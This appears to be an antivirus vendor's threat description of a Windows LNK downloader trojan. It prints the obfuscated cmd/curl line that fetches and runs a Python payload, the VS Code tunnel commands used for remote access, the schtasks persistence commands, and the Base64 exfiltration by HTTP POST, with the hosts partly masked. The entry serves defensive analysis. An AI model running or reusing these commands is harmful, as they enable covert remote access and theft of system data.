Trojan.LNK.DOWNLOADER.D

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Detalles de entrada

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Instalación

Infiltra los archivos siguientes:

• %AppDataLocal%\Microsoft\Python\update.py
• %AppDataLocal%\Microsoft\python.zip
  • After extracting to %AppDataLocal%\Microsoft\Python:
    • _asyncio.pyd
    • _bz2.pyd
    • _ctypes.pyd
    • _decimal.pyd
    • _elementtree.pyd
    • _hashlib.pyd
    • _lzma.pyd
    • _msi.pyd
    • _multiprocessing.pyd
    • _overlapped.pyd
    • _queue.pyd
    • _socket.pyd
    • _sqlite3.pyd
    • _ssl.pyd
    • _uuid.pyd
    • _wmi.pyd
    • _zoneinfo.pyd
    • libcrypto-3.dll
    • libffi-8.dll
    • libssl-3.dll
    • LICENSE.txt
    • pyexpat.pyd
    • python.cat
    • python.exe
    • python.zip
    • python3.dll
    • python312._pth
    • python312.dll
    • python312.zip
    • pythonw.exe
    • select.pyd
    • sqlite3.dll
    • unicodedata.pyd
    • vcruntime140_1.dll
    • vcruntime140.dll
    • winsound.pyd

Agrega los procesos siguientes:

• "%System%\cmd.exe" /c start msg {Username} "安裝成功" & c^u^r^l -s -k https://www.{BLOCKED}n.org/ftp/python/3.12.5/python-3.12.5-embed-amd64.zip -o "%AppDataLocal%\Microsoft\python.zip" & timeout 10 & mkdir "%AppDataLocal%\Microsoft\Python" & tar -xf "%AppDataLocal%\Microsoft\python.zip" -C "%AppDataLocal%\Microsoft\Python" & c^u^r^l -s -k https://{BLOCKED}e.ee/r/DQjrd/0 -o "%AppDataLocal%\Microsoft\Python\update.py" & start "" /B "%AppDataLocal%\Microsoft\Python\pythonw.exe" "%AppDataLocal%\Microsoft\Python\update.py"

Crea las carpetas siguientes:

• %AppDataLocal%\Microsoft\Python

Rutina de descarga

Guarda los archivos que descarga con los nombres siguientes:

• %AppDataLocal%\Microsoft\python.zip → legitimate Python 3.12.5 x64 zip file
• %AppDataLocal%\Microsoft\Python\update.py → malicious Python code

Otros detalles

Hace lo siguiente:

• It sends Windows message "安裝成功" translated to "Installation successful".
• It downloads a legitimate 64-bit Python 3.12.5 embedded zip file and extracts its contents.
• It downloads a malicious Python script file from a URL and executes using the extracted Python package.
• It requires the following command line tools to proceed with its intended routine:
  • curl
  • tar
• The executed Python code does the following:
  • It fetches running processes using tasklist command.
  • It connects to the following URL(s) to download its component file(s):
    • https://{BLOCKED}95.vo.msecnd.net/stable/97dec172d3256f8ca4bfb2143f3f76b503ca0534/vscode_cli_win32_x64_cli.zip
  • It saves the files it downloads using the following names:
    • %AppDataLocal%\Microsoft\vscode.zip → contains a file named code.exe
  • It adds the following folders:
    • %AppDataLocal%\Microsoft\VSCode
  • It extracts the zip file into the created folder with the following filename:
    • %AppDataLocal%\Microsoft\VSCode\code.exe
  • After extraction, it deletes the previously downloaded zip file.
  • It adds the following processes:
    • %System%\cmd.exe /c "%AppDataLocal%\Microsoft\VSCode\code.exe tunnel --accept-server-license-terms user logout"
    • %System%\cmd.exe /c "%AppDataLocal%\Microsoft\VSCode\code.exe --locale en-US tunnel --accept-server-license-terms --name "{Computer Name}"
      • Saves the output into the following files:
        • %AppDataLocal%\Microsoft\VSCode\output.txt
        • %AppDataLocal%\Microsoft\VSCode\output2.txt
    • schtasks /create /tn "MicrosoftHealthcareMonitorNode" /tr "%AppDataLocal%\Microsoft\Python\pythonw.exe %AppDataLocal%\Microsoft\Python\update.py" /st 08:00 /sc HOURLY /mo 4 /f
    • schtasks /create /tn "MicrosoftHealthcareMonitorNode" /tr "%AppDataLocal%\Microsoft\Python\pythonw.exe %AppDataLocal%\Microsoft\Python\update.py" /sc ONLOGON /ru SYSTEM /rl HIGHEST /f
  • It retrieves the following information from the affected system:
    • System Locale
    • Computer Name
    • Username
    • User Domain
    • %Program Files% Contents
    • %ProgramData% Contents
    • %System Root%\Users Contents
  • It encodes the collected information into a Base64 format.
  • It sends the gathered information via HTTP POST to the following URL:
    • http://{BLOCKED}o.com/r/2yxp98b3/{Encoded Base64 String of Collected information}
  • It adds the following scheduled tasks:
    • If executed as user:
      • Location: {Root Directory}
        Name: MicrosoftHealthcareMonitorNode
        Trigger: One time at 8:00 AM on {Scheduled Task Create Time} → After triggered, repeat every 04:00:00 indefinitely.
        Action: Start a program → %AppDataLocal%\Microsoft\Python\pythonw.exe %AppDataLocal%\Microsoft\Python\update.py
    • If executed as an administrator:
      • Location: {Root Directory}
        Name: MicrosoftHealthcareMonitorNode
        Trigger: At log on of any user
        Action: Start a program → %AppDataLocal%\Microsoft\Python\pythonw.exe %AppDataLocal%\Microsoft\Python\update.py